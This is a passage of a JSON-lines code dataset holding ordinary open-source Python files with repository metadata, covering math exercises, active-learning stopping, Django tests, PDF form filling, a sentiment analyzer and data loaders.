function\n","repo_name":"JacobPhillipsDK/OCR-text-recognition","sub_path":"source/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71875662162","text":"'''\n PROBLEM:\n\n \"The town of Tola has population of 40,000 and produces\n 13 tons of garbage each week. Express this information in terms of\n the function f and explain the meaning of f(5) = 2\"\n\n\n\n\n\n\n\n\n\n\n SOLUTION:\n\n\n\n'''\n\n# We can go ahead and do the same basic setup and solve it by getting\n# the slope and use population as x-axis and garbage as y-axis where\n# our two datapoints would be (0,0) and (40,13)\n# ^^ 0,0 because when population is 0 garbage/weeks would obviously be 0\n\n# But I'm going to solve it another way by creating a function f where\n# G = f(P) ( garbage = value of function f when population is it's parameter )\n\n# The reason I'm solving it this way is because I want to show you all the different\n# ways you can solve these problems. If you don't get this solution, it's fine.\n\nimport matplotlib.pyplot as plt\n\ndef f(population):\n garbage_per_person = 13 / 40 # Calculate the average garbage produced per person\n G = garbage_per_person * population # Calculate the total garbage produced\n return G # G = f(P)\n\n# Generate population values from 0 to 100\npopulation_values = range(0, 101) # xmin-xmax\n\n# Calculate garbage production for each population value\ngarbage_values = [f(population) for population in population_values]\n\n# Basic configurations\nplt.title(\"Garbage Production in Tola\")\nplt.xlabel(\"Population\")\nplt.ylabel(\"Garbage (tons)\")\nplt.grid(True)\nplt.axis([0,100, 0,50]) # feel free to change this\n\n# Plot the data\nplt.plot(population_values, garbage_values)\n\nplt.show()\n\n# We were also asked to explain the meaning of \"f(5) = 2\" which basically means\n# that if the population is 5000, 2 tons of garbage is produced per week.","repo_name":"Whqat/college-algebra-with-python-fcc","sub_path":"section1/6.word_problems/problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36128543385","text":"from typing import Union, List, Tuple\nimport numpy as np\nfrom scipy.stats import norm\nfrom sklearn.preprocessing import MinMaxScaler\nfrom active_learning.base_policy import Inputs, Labels, Indices, Probs\nfrom active_learning.stopping_strategy import StoppingStrategy\n\n\nclass KneeStopping(StoppingStrategy):\n def __init__(self, *args, window=3, flats=10, rho=\"dynamic\", **kwargs):\n super().__init__(*args, **kwargs)\n self.window = window\n self.flats = flats\n self.rho: Union[str, float] = rho\n self.knee_data: List[Tuple[int, int]] = []\n\n def __str__(self):\n return \"Knee\"\n\n def should_stop(\n self,\n x: Inputs,\n y: Labels,\n train_idxs: Indices,\n val_idxs: Indices,\n scores: Probs,\n i: int,\n ) -> bool:\n if i < self.min_rounds:\n return False\n x_tr, y_tr = x[train_idxs], y[train_idxs]\n current_rels = y_tr.sum()\n n_assessed = len(y_tr)\n self.knee_data.append((n_assessed, current_rels))\n knee_indices = self.__detect_knee()\n if knee_indices:\n knee_index = knee_indices[-1]\n rank1, r1 = self.knee_data[knee_index]\n rank2, r2 = self.knee_data[-1]\n try:\n current_rho = float(r1 / rank1) / float((r2 - r1 + 1) / (rank2 - rank1))\n except ZeroDivisionError:\n current_rho = 0\n\n rho = 156 - min(current_rels, 150) if self.rho == \"dynamic\" else self.rho\n return self._check_rho(current_rho, rho, len(y), current_rels, n_assessed)\n return False\n\n def _check_rho(self, current_rho, rho, num_docs, current_rels, n_assessed):\n return current_rho > rho and n_assessed > self.min_rounds\n\n def __detect_knee(self) -> List[int]:\n \"\"\"\n Implementation of the Knee method. Copied and adapted from\n https://github.com/dli1/auto-stop-tar/blob/master/autostop/tar_model/knee.py\n\n Detect the so-called knee in the data.\n The implementation is based on paper [1] and code here (https://github.com/jagandecapri/kneedle).\n\n Uses:\n self._knee_window: The data is smoothed using Gaussian kernel average smoother, this parameter is the window\n used for averaging (higher values mean more smoothing, try 3 to begin with).\n self._knee_flats: How many \"flat\" points to require before we consider it a knee.\n\n Alessio: I don't think in Cormack's paper the window size is explicitly mentioned.\n \"\"\"\n\n knee_indices = []\n data_size = len(self.knee_data)\n data = np.array(self.knee_data)\n\n if data_size == 1:\n return knee_indices\n\n # smooth\n smoothed_data = []\n for i in range(data_size):\n if 0 < i - self.window:\n start_index = i - self.window\n else:\n start_index = 0\n if i + self.window > data_size - 1:\n end_index = data_size - 1\n else:\n end_index = i + self.window\n\n sum_x_weight = 0\n sum_y_weight = 0\n sum_index_weight = 0\n for j in range(start_index, end_index):\n index_weight = norm.pdf(abs(j - i) / self.window, 0, 1)\n sum_index_weight += index_weight\n sum_x_weight += index_weight * data[j][0]\n sum_y_weight += index_weight * data[j][1]\n\n smoothed_x = sum_x_weight / sum_index_weight\n smoothed_y = sum_y_weight / sum_index_weight\n\n smoothed_data.append((smoothed_x, smoothed_y))\n\n smoothed_data = np.array(smoothed_data)\n\n # normalize\n normalized_data = MinMaxScaler().fit_transform(smoothed_data)\n\n # difference\n differed_data = [(x, y - x) for x, y in normalized_data]\n\n # find indices for local maximums\n candidate_indices = []\n for i in range(1, data_size - 1):\n if (differed_data[i - 1][1] < differed_data[i][1]) and (differed_data[i][1] > differed_data[i + 1][1]):\n candidate_indices.append(i)\n\n # threshold\n step = self.flats * (normalized_data[-1][0] - data[0][0]) / (data_size - 1)\n\n # knees\n for i in range(len(candidate_indices)):\n candidate_index = candidate_indices[i]\n\n if i + 1 < len(candidate_indices): # not last second\n end_index = candidate_indices[i + 1]\n else:\n end_index = data_size\n\n threshold = differed_data[candidate_index][1] - step\n\n for j in range(candidate_index, end_index):\n if differed_data[j][1] < threshold:\n knee_indices.append(candidate_index)\n break\n return knee_indices\n","repo_name":"levnikmyskin/salt","sub_path":"baselines/cormack_knee/knee_stopping.py","file_name":"knee_stopping.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12604364103","text":"\"\"\"\nTest the bulk email opt out view.\n\"\"\"\n\nimport ddt\nimport pytest\nfrom django.http import Http404\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\n\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom lms.djangoapps.bulk_email.models import Optout\nfrom lms.djangoapps.bulk_email.views import opt_out_email_updates\nfrom lms.djangoapps.discussion.notification_prefs.views import UsernameCipher\nfrom openedx.core.lib.tests import attr\nfrom xmodule.modulestore.tests.django_utils import ModuleStoreTestCase # lint-amnesty, pylint: disable=wrong-import-order\nfrom xmodule.modulestore.tests.factories import CourseFactory # lint-amnesty, pylint: disable=wrong-import-order\n\n\n@attr(shard=1)\n@ddt.ddt\n@override_settings(SECRET_KEY=\"test secret key\")\nclass OptOutEmailUpdatesViewTest(ModuleStoreTestCase):\n \"\"\"\n Check the opt out email functionality.\n \"\"\"\n def setUp(self):\n super().setUp()\n self.user = UserFactory.create(username=\"testuser1\", email='test@example.com')\n self.course = CourseFactory.create(run='testcourse1', display_name='Test Course Title')\n self.token = UsernameCipher.encrypt('testuser1')\n self.request_factory = RequestFactory()\n self.url = reverse('bulk_email_opt_out', args=[self.token, str(self.course.id)])\n\n # Ensure we start with no opt-out records\n assert Optout.objects.count() == 0\n\n def test_opt_out_email_confirm(self):\n \"\"\"\n Ensure that the default GET view asks for confirmation.\n \"\"\"\n response = self.client.get(self.url)\n self.assertContains(response, \"confirm unsubscribe from\")\n assert Optout.objects.count() == 0\n\n def test_opt_out_email_unsubscribe(self):\n \"\"\"\n Ensure that the POSTing \"confirm\" creates the opt-out record.\n \"\"\"\n response = self.client.post(self.url, {'unsubscribe': True})\n self.assertContains(response, \"You have successfully unsubscribed from\")\n assert Optout.objects.count() == 1\n\n def test_opt_out_email_cancel(self):\n \"\"\"\n Ensure that the POSTing \"cancel\" does not create the opt-out record\n \"\"\"\n response = self.client.post(self.url)\n self.assertContains(response, \"You have not been unsubscribed from\")\n assert Optout.objects.count() == 0\n\n @ddt.data(\n (\"ZOMG INVALID BASE64 CHARS!!!\", \"base64url\", False),\n (\"Non-ASCII\\xff\".encode(), \"base64url\", False),\n (\"D6L8Q01ztywqnr3coMOlq0C3DG05686lXX_1ArEd0ok\", \"base64url\", False),\n (\"AAAAAAAAAAA=\", \"initialization_vector\", False),\n (\"nMXVK7PdSlKPOovci-M7iqS09Ux8VoCNDJixLBmj\", \"aes\", False),\n (\"AAAAAAAAAAAAAAAAAAAAAMoazRI7ePLjEWXN1N7keLw=\", \"padding\", False),\n (\"AAAAAAAAAAAAAAAAAAAAACpyUxTGIrUjnpuUsNi7mAY=\", \"username\", False),\n (\"_KHGdCAUIToc4iaRGy7K57mNZiiXxO61qfKT08ExlY8=\", \"course\", 'course-v1:testcourse'),\n )\n @ddt.unpack\n def test_unsubscribe_invalid_token(self, token, message, course):\n \"\"\"\n Make sure that view returns 404 in case token is not valid\n \"\"\"\n request = self.request_factory.get(\"dummy\")\n with pytest.raises(Http404) as err:\n opt_out_email_updates(request, token, course)\n assert message in err\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/bulk_email/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"37400792246","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\r\nfrom PyPDF2.generic import BooleanObject, NameObject, IndirectObject\r\n\r\nfrom notificationPopup import show_error_popup\r\n\r\n\r\ndef __set_need_appearances_writer(writer):\r\n\t\"\"\"Fixes glitches in backend of pdf writer, see: https://github.com/mstamy2/PyPDF2/issues/355#issuecomment-360575792\"\"\"\r\n\ttry:\r\n\t\tcatalog = writer._root_object\r\n\t\t# get the AcroForm tree and add \"/NeedAppearances attribute\r\n\t\tif \"/AcroForm\" not in catalog:\r\n\t\t\twriter._root_object.update({\r\n\t\t\t\tNameObject(\"/AcroForm\"): IndirectObject(len(writer._objects), 0, writer)})\r\n\r\n\t\tneed_appearances = NameObject(\"/NeedAppearances\")\r\n\t\twriter._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(True)\r\n\t\treturn writer\r\n\r\n\texcept Exception as e:\r\n\t\tshow_error_popup(\"Error: __set_need_appearances_writer() catch : \" + repr(e)) # pipe it to the main out.\r\n\t\treturn writer\r\n\r\n\r\ndef __verify_pdf_acro_reader(pdf):\r\n\tif \"/AcroForm\" in pdf.trailer[\"/Root\"]:\r\n\t\tpdf.trailer[\"/Root\"][\"/AcroForm\"].update({NameObject(\"/NeedAppearances\"): BooleanObject(True)})\r\n\r\n\r\ndef __verify_pdf_acro_writer(pdf):\r\n\tif \"/AcroForm\" in pdf._root_object:\r\n\t\tpdf._root_object[\"/AcroForm\"].update({NameObject(\"/NeedAppearances\"): BooleanObject(True)})\r\n\r\n\r\ndef write_pdf_from_template(pdf_template_path: str, pdf_write_path: str, variable_dictionary: dict):\r\n\t\"\"\"\r\n\tWrites a pdf with the fields supplied, as to match the template whose path is supplied. Reads and writes all in one.\r\n\t:param pdf_template_path: template path (in our case, safety_checklist.pdf)\r\n\t:param pdf_write_path: output file path (user selected)\r\n\t:param variable_dictionary: form data which is used in a key-value set to the open PDF fields\r\n\t\"\"\"\r\n\tpdf_template = PdfFileReader(open(pdf_template_path, \"rb\"), strict=False)\r\n\t__verify_pdf_acro_reader(pdf_template)\r\n\r\n\tpdf_writer = PdfFileWriter()\r\n\t__set_need_appearances_writer(pdf_writer)\r\n\t__verify_pdf_acro_writer(pdf_writer)\r\n\r\n\tfor page_num in range(pdf_template.numPages):\r\n\t\tpdf_writer.addPage(pdf_template.getPage(page_num))\r\n\r\n\tfor page_num in range(pdf_template.numPages):\r\n\t\tpdf_writer.updatePageFormFieldValues(pdf_writer.getPage(page_num), variable_dictionary)\r\n\r\n\twith open(pdf_write_path, 'wb') as f:\r\n\t\tpdf_writer.write(f)\r\n","repo_name":"bcstpu/Safety-Checklist-App","sub_path":"pdfWriter.py","file_name":"pdfWriter.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11394579801","text":"n = int(input())\n\nvalues_list, results = [], []\n\nstack = {\n 'global': {\n 'variable': [],\n 'parent': None\n }\n}\n\n\ndef add(namesp: str, var: int):\n\n \"\"\"\n Adds elements into known namespaces and all variabls into values_list\n :param namesp:\n :param var:\n :return:\n \"\"\"\n\n global stack\n stack[namesp]['variable'].append(var)\n values_list.append(var)\n\n\ndef create(namesp: str, parent: str):\n\n \"\"\"\n Creates new namespace\n :param namesp:\n :param parent:\n :return:\n \"\"\"\n\n global stack\n if namesp not in stack:\n stack[namesp] = {\n 'variable': [],\n 'parent': parent\n }\n\n\ndef get_var(namesp: str, var: int):\n\n \"\"\"\n Returns the namespace of incomming var or None if namespace\\var doesn't exsist\n :param namesp:\n :param var:\n :return:\n \"\"\"\n\n global stack\n if var not in values_list or namesp not in stack:\n return None\n else:\n return namesp if var in stack[namesp]['variable'] \\\n else get_var(stack[namesp]['parent'], var)\n\n\nfor i in range(n):\n command, namesp, var_par = input().split()\n if command == 'add':\n add(namesp, var_par)\n elif command == 'create':\n create(namesp, var_par)\n else:\n res = get_var(namesp, var_par)\n results.append(res)\n\nprint(*results, sep='\\n')\n","repo_name":"ClientFromHell/stepik","sub_path":"General_Python/1.0/prostranstvi_imen.py","file_name":"prostranstvi_imen.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25879455082","text":"from math import sqrt\n \ndef isPrime(n): \n if (n <= 1): \n return False\n if (n <= 3): \n return True\n if (n % 2 == 0 or n % 3 == 0): \n return False\n i = 5\n while(i * i <= n): \n if (n % i == 0 or n % (i + 2) == 0): \n return False\n i = i + 6\n return True\n\ndef power(x, y, p): \n res = 1 \n x = x % p \n while (y > 0): \n if (y & 1): \n res = (res * x) % p \n y = y >> 1 \n x = (x * x) % p \n return res \n\ndef findPrimefactors(s, n): \n while (n % 2 == 0): \n s.add(2) \n n = n // 2\n for i in range(3, int(sqrt(n)), 2): \n while (n % i == 0): \n s.add(i) \n n = n // i \n if (n > 2): \n s.add(n) \n\ndef findPrimitive(n): \n s = set() \n if (isPrime(n) == False): \n return -1 \n phi = n - 1\n findPrimefactors(s, phi) \n for r in range(2, phi + 1): \n\n flag = False\n for it in s: \n\n if (power(r, phi // it, n) == 1): \n\n flag = True\n break\n\t\t\t \n if (flag == False): \n return r \n\n return -1\n\nn = 761\nprint(\"Smallest primitive root of\", \n n, \"is\", findPrimitive(n)) \n\n\n","repo_name":"roca12/gpccodes","sub_path":"Recien traducido/Matematica/PrimitiveRoot.py","file_name":"PrimitiveRoot.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29266116496","text":"\"\"\"Create a new field for documents in product model\n\nRevision ID: 531997d75f68\nRevises: 0172a3e2f2a0\nCreate Date: 2023-06-26 08:13:17.218787\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '531997d75f68'\ndown_revision = '0172a3e2f2a0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('products', sa.Column('document_url', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('products', 'document_url')\n # ### end Alembic commands ###\n","repo_name":"dmitryzhurkovsky/cabel_torg","sub_path":"backend/migrations/versions/531997d75f68_create_a_new_field_for_documents_in_.py","file_name":"531997d75f68_create_a_new_field_for_documents_in_.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35268563665","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nZetCode PyQt5 tutorial \r\n\r\nThis program creates a quit\r\nbutton. When we press the button,\r\nthe application terminates. \r\n\r\nAuthor: Jan Bodnar\r\nWebsite: zetcode.com \r\nLast edited: August 2017\r\n\"\"\"\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QApplication\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.initUI()\r\n \r\n \r\n def initUI(self): \r\n \r\n qbtn = QPushButton('Quit', self)\r\n qbtn.clicked.connect(QCoreApplication.instance().quit) # 事件传递\r\n qbtn.resize(qbtn.sizeHint())\r\n qbtn.move(50, 50) \r\n \r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle('Quit button') \r\n self.show()\r\n \r\n \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n sys.exit(app.exec_())","repo_name":"Yeah-Kun/python","sub_path":"GUI/qt/ZetCode/Closing_a_window.py","file_name":"Closing_a_window.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"} +{"seq_id":"35610867","text":"import sys\nimport io\nimport datetime\nimport math\nimport os.path\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer as SIA\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom driver import *\n\ncomment_df = pd.DataFrame([], columns = comment_df_columns)\n\ndef update_sentiment(path):\n global comment_df\n fullpath = 'game_comment_dfs/'+path+'.csv'\n # Read given file\n if os.path.isfile(fullpath):\n comment_df = pd.read_csv(fullpath)[comment_df_columns]\n print(\"Read \" + fullpath)\n else:\n print(path + \" was not found\")\n return\n # Update polaraities for each comment\n polarities = []\n sia = SIA()\n for comment in comment_df['body']:\n pol_score = sia.polarity_scores(comment)\n polarities.append(pol_score['compound'])\n assert len(polarities) == len(comment_df)\n # assign new column and save it to CSV\n comment_df['polarity'] = polarities\n print(comment_df.head())\n comment_df.to_csv(fullpath)\n print('Succesfully updated polarities for ' + path + ' to CSV')\n\ndef avg_over_time(path):\n post_df = pd.read_csv(\"post_df.csv\")[post_df_columns]\n fullpath = 'game_comment_dfs/'+path+'.csv'\n comment_df = pd.read_csv(fullpath)[['body', 'author_flair_text', 'score', 'created_utc', 'link_id', 'polarity']]\n game_vars = path.split('_')\n team_1 = game_vars[2]\n team_2 = game_vars[3]\n # set time limit to 5 hours after game start\n start_time = post_df[post_df['link_id']==game_vars[1]]['created_utc'].values[0]\n print(start_time)\n time_limit = start_time + 18000\n # intialize graph_data\n graph_data = pd.DataFrame(0.0, index=range(30), columns=[team_1 +' sum', team_2+' sum', 'Everyone else sum', team_1+' cnt', team_2+' cnt', 'Everyone else cnt'])\n # print(graph_data.shape)\n for idx in comment_df.index:\n # print(comment_df['created_utc'][idx])\n # print(comment_df.loc[idx, 'created_utc'])\n # print(time_limit)\n if comment_df.loc[idx, 'created_utc'] >= time_limit:\n continue\n com_pol = comment_df['polarity'][idx]\n print(com_pol)\n com_tm = comment_df['author_flair_text'][idx]\n com_idx = int((comment_df['created_utc'][idx] - start_time) / 600)\n # print(com_idx)\n # Data for 2 teams in the game\n if (com_tm == team_1) or (com_tm == team_2):\n graph_data.loc[com_idx][com_tm+' sum'] += float(com_pol)\n graph_data.loc[com_idx][com_tm+' cnt'] += 1\n # Everyone else data\n else:\n graph_data.loc[com_idx]['Everyone else sum'] += float(com_pol)\n graph_data.loc[com_idx]['Everyone else cnt'] += 1\n utcs = [start_time + (i * 600) for i in range(30)]\n graph_data['utcs'] = utcs\n print(graph_data.head())\n graph_data.to_csv('graph_data.csv')\n\n\n\n\n # print(\"before and after\")\n print(len(comment_df))\n # post_df = post_df[post_df['created_utc']. < time_limit]\n # print(len(comment_df[comment_df['created_utc'] < pd.Series([time_limit] * len(comment_df))]))\n # print(start_time)\n\n\n\ntest_path = 'week11_dxpi00_Broncos_Vikings'\n# update_sentiment(test_path)\navg_over_time(test_path)\n","repo_name":"colinlai7/nfl-sentiment-bot","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10654805594","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp_secret = os.getenv(\"SERVER_APP_SECRET\")\n\ndb = SQLAlchemy()\nDB_NAME = \"database.db\"\n\ndef create_app():\n app = Flask(__name__)\n app.config[\"SECRET_KEY\"] = app_secret\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{DB_NAME}\"\n db.init_app(app)\n\n if not os.path.exists(DB_NAME):\n db.create_all(app=app)\n\n return app\n","repo_name":"kaosi-anikwe/spleeter","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16771895019","text":"import torch.utils.data as data\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch\nfrom base import BaseDataLoader\nfrom utils import read_json\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom features import AudioFeatureExtractor, TextFeatureExtractor, VisualFeatureExtractor, PersonalityFeatureExtractor\n\nEMOTIONS = [\"neutral\",\"joy\",\"anger\",\"disgust\",\"sadness\",\"surprise\",\"fear\",\"anticipation\",\"trust\",\"serenity\",\"interest\",\"annoyance\",\"boredom\",\"distraction\"]\n\nclass MEmoRDataset(data.Dataset):\n \n def __init__(self, config):\n super().__init__()\n self.config = config\n annos = read_json(config['anno_file'])[config['emo_type']]\n # ids = []\n # tmp_annos = []\n # with open(config['id_file']) as fin:\n # for line in fin.readlines():\n # ids.append(int(line.strip()))\n \n # for jj, anno in enumerate(annos):\n # if jj in ids:\n # tmp_annos.append(anno)\n # annos = tmp_annos\n \n emo_num = 9 if config['emo_type'] == 'primary' else 14\n self.emotion_classes = EMOTIONS[:emo_num]\n \n data = read_json(config['data_file'])\n self.visual_features, self.audio_features, self.text_features = [], [], []\n self.visual_valids, self.audio_valids, self.text_valids = [], [], []\n self.labels = []\n self.charcaters_seq = []\n self.time_seq = []\n self.target_loc = []\n self.seg_len = [] \n self.n_character = []\n vfe = VisualFeatureExtractor(config)\n afe = AudioFeatureExtractor(config)\n tfe = TextFeatureExtractor(config)\n pfe = PersonalityFeatureExtractor(config)\n self.personality_list = pfe.get_features()\n self.personality_features = []\n \n\n for jj, anno in enumerate(tqdm(annos)):\n clip = anno['clip']\n target_character = anno['character']\n target_moment = anno['moment']\n on_characters = data[clip]['on_character']\n if target_character not in on_characters:\n on_characters.append(target_character)\n on_characters = sorted(on_characters)\n \n charcaters_seq, time_seq, target_loc, personality_seq = [], [], [], []\n \n for character in on_characters:\n for ii in range(len(data[clip]['seg_start'])):\n charcaters_seq.append([0 if character != i else 1 for i in range(len(config['speakers']))])\n time_seq.append(ii)\n personality_seq.append(self.personality_list[character])\n if character == target_character and data[clip]['seg_start'][ii] <= target_moment < data[clip]['seg_end'][ii]:\n target_loc.append(1)\n else:\n target_loc.append(0)\n \n vf, v_valid = vfe.get_feature(anno['clip'], target_character)\n af, a_valid = afe.get_feature(anno['clip'], target_character)\n tf, t_valid = tfe.get_feature(anno['clip'], target_character)\n \n \n self.n_character.append(len(on_characters))\n self.seg_len.append(len(data[clip]['seg_start']))\n \n self.personality_features.append(torch.stack(personality_seq))\n self.charcaters_seq.append(torch.tensor(charcaters_seq))\n self.time_seq.append(torch.tensor(time_seq))\n self.target_loc.append(torch.tensor(target_loc, dtype=torch.int8))\n self.visual_features.append(vf)\n self.audio_features.append(af)\n self.text_features.append(tf)\n self.visual_valids.append(v_valid)\n self.audio_valids.append(a_valid)\n self.text_valids.append(t_valid)\n self.labels.append(self.emotion_classes.index(anno['emotion'])) \n \n\n def __getitem__(self, index):\n \n return torch.tensor([self.labels[index]]), \\\n self.visual_features[index], \\\n self.audio_features[index], \\\n self.text_features[index], \\\n self.personality_features[index], \\\n self.visual_valids[index], \\\n self.audio_valids[index], \\\n self.text_valids[index], \\\n self.target_loc[index], \\\n torch.tensor([1]*len(self.time_seq[index]), dtype=torch.int8), \\\n torch.tensor([self.seg_len[index]], dtype=torch.int8), \\\n torch.tensor([self.n_character[index]], dtype=torch.int8)\n \n\n def __len__(self):\n return len(self.visual_features)\n\n def collate_fn(self, data):\n dat = pd.DataFrame(data)\n return [pad_sequence(dat[i], True) for i in dat]\n\n def statistics(self):\n all_emotion = [0] * len(self.emotion_classes)\n for emotion in self.labels:\n all_emotion[emotion] += 1\n return all_emotion\n\n\nclass MEmoRDataLoader(BaseDataLoader):\n def __init__(self, config, training=True):\n data_loader_config = config['data_loader']['args']\n self.seed = data_loader_config['seed']\n self.dataset = MEmoRDataset(config)\n self.emotion_nums = self.dataset.statistics()\n super().__init__(self.dataset, data_loader_config['batch_size'], data_loader_config['shuffle'], data_loader_config['validation_split'], data_loader_config['num_workers'], collate_fn=self.dataset.collate_fn)\n\n def _split_sampler(self, split):\n if split == 0.0:\n return None, None\n\n idx_full = np.arange(self.n_samples)\n\n np.random.seed(self.seed)\n np.random.shuffle(idx_full)\n\n if isinstance(split, int):\n assert split > 0\n assert split < self.n_samples, \"validation set size is configured to be larger than entire dataset.\"\n len_valid = split\n else:\n len_valid = int(self.n_samples * split)\n\n valid_idx = idx_full[0:len_valid]\n train_idx = np.delete(idx_full, np.arange(0, len_valid))\n weights_per_class = 1. / torch.tensor(self.emotion_nums, dtype=torch.float)\n weights = [0] * self.n_samples\n for idx in range(self.n_samples):\n if idx in valid_idx:\n weights[idx] = 0.\n else:\n label = self.dataset[idx][0]\n weights[idx] = weights_per_class[label]\n weights = torch.tensor(weights)\n train_sampler = data.WeightedRandomSampler(weights=weights, num_samples=len(weights), replacement=True)\n \n valid_sampler = data.SubsetRandomSampler(valid_idx)\n\n # turn off shuffle option which is mutually exclusive with sampler\n self.shuffle = False\n self.n_samples = len(train_idx)\n\n return train_sampler, valid_sampler\n","repo_name":"sunlightsgy/MEmoR","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"} +{"seq_id":"30392486909","text":"from stepper import Stepper\nimport time\n# Move the stepper from start point to end point\nstep = Stepper(\"/dev/ttyACMA0\")\ntime.sleep(0.5)\nstep.moveStep()\ntime.sleep(12.5)\nstep.moveBack()\ntime.sleep(1)\nstep.com.close()","repo_name":"TimothySingowikromo/baby3dscanner","sub_path":"baby3dscanner/test/stepper_test.py","file_name":"stepper_test.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13436163284","text":"\"\"\"\nThis batch should only be run when we want to load symbols for a specific\nexchange into our database\n\npython -m server.batch.setup_exchange_symbols --name=NYSE\n\"\"\"\nimport argparse\nimport os\nfrom sqlalchemy.exc import IntegrityError\n\nfrom server.database import db_session\nfrom server.data_access.stock_exchange import get_stock_exchange\nfrom server.data_access.stock_exchange import register_stock_exchange\nfrom server.data_access.ticker import register_ticker_symbol\n\n# Parse the arguments to get the exchange we want to load information for\nparser = argparse.ArgumentParser(\n description=\"Setup an exchange and its related tickers\"\n)\nparser.add_argument(\"--name\", type=str, help=\"The stock exchange symbol\", required=True)\nargs = parser.parse_args()\n\nexchange_name = args.name\n\n# Create the exchange if it doesn't already exist. Fetch it if it already\n# exists\ntry:\n stock_exchange = register_stock_exchange(name=exchange_name)\nexcept IntegrityError:\n db_session.rollback()\n stock_exchange = get_stock_exchange(name=exchange_name)\n\n# Load the symbols and company names into the symbols database\nsymbols_file_path = os.getcwd() + f\"/server/data/exchange/{exchange_name}.txt\"\ntry:\n with open(symbols_file_path, \"r\") as f:\n for line in f.readlines()[1:]:\n try:\n symbol, name = line.strip().split(\"\\t\")\n except ValueError:\n continue\n\n try:\n register_ticker_symbol(stock_exchange.id, symbol, name)\n except IntegrityError:\n db_session.rollback()\n print(f\"ERROR: Integrity error while persisting {symbol}\")\n continue\nexcept FileNotFoundError:\n print(f\"ERROR: Could not find the file with ticker symbols\")\n","repo_name":"gkeswani92/stock-portfolio","sub_path":"server/batch/setup_exchange_symbols.py","file_name":"setup_exchange_symbols.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8616188934","text":"from __future__ import annotations\n\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom typing import Optional, Dict, List, Set, FrozenSet, Any\nfrom typing import Tuple\n\nfrom sleepy.errors import ParseError\nfrom sleepy.syntactical_analysis.grammar import EPSILON, Production, SyntaxTree, IGNORED_TOKEN, \\\n get_token_word_from_tokens_pos, TreePosition, AttributeGrammar, DummyPath, Grammar\n\n\ndef make_first1_sets(grammar: Grammar) -> Dict[str, Set[Optional[str]]]:\n # fi(x) = {x} for all terminals, compute non-terminals iteratively\n first1_sets: Dict[str, Set[Optional[str]]] = {\n symbol: {symbol} if symbol in grammar.terminals else set()\n for symbol in grammar.symbols}\n changes = True\n while changes:\n changes = False\n for symbol in grammar.non_terminals:\n first1 = set()\n for prod in grammar.get_prods_for(symbol):\n first1.update(get_first1_set_for_word(first1_sets, prod.right))\n if first1 != first1_sets[symbol]:\n first1_sets[symbol] = first1\n changes = True\n\n assert all(all(x in grammar.terminals or x is EPSILON for x in first1) for first1 in 